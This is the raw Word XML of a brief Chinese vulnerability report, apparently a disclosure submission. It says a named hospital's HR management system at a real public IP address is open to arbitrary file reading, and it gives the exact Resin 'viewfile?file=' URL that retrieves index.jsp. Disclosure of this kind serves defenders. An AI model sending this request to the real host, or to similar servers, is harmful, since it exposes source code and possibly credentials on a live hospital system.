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25D47" w14:textId="1E8D8672" w:rsidR="0044246B" w:rsidRPr="00F7586A" w:rsidRDefault="00114220">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F7586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>桂平市人民医院人力资源管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>存在任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366B79F6" w14:textId="7293D293" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0250B5" w14:textId="25C94640" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114220">
        <w:t>http://218.65.238.44:8081/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E2F68" w14:textId="57265A05" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7558644E" wp14:editId="6FD5DD24">
            <wp:extent cx="5274310" cy="28054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98F9" w14:textId="02A4EAB3" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后添加路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCC970B" w14:textId="6D6A91BD" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114220">
        <w:t>http://218.65.238.44:8081/resin-doc/viewfile/?file=index.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B1AAD7" w14:textId="45930C21" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35451805" wp14:editId="3EBE9BEB">
            <wp:extent cx="5274310" cy="28619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7758" w14:textId="705825CE" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可读取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CA5C6" w14:textId="28790E17" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40422178" w14:textId="440AD599" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="6EB12DAA" w14:textId="1E31BFDB" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="7599FA04" w14:textId="2F1953E8" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="79B4A6D9" w14:textId="2271BC2F" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="004D198A" w14:textId="28D97B08" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="3A51A8B7" w14:textId="69C24F4B" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="5E68CFC7" w14:textId="75F7F5D5" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="449EE5D6" w14:textId="1EE42D84" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="32B2F493" w14:textId="165D7A28" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="1B240057" w14:textId="4F2DB8BC" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="2814E7CE" w14:textId="450D85B4" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="32CF2940" w14:textId="506E5471" w:rsidR="00114220" w:rsidRDefault="00114220"/>
    <w:p w14:paraId="33AA44E0" w14:textId="77777777" w:rsidR="00114220" w:rsidRDefault="00114220">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001142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51F"/>
    <w:rsid w:val="00114220"/>
    <w:rsid w:val="0044246B"/>
    <w:rsid w:val="0070451F"/>
    <w:rsid w:val="00F7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96407"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4E1CDF71-36E2-4828-B154-836556AA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川田</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>川田</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-31T02:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-31T02:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>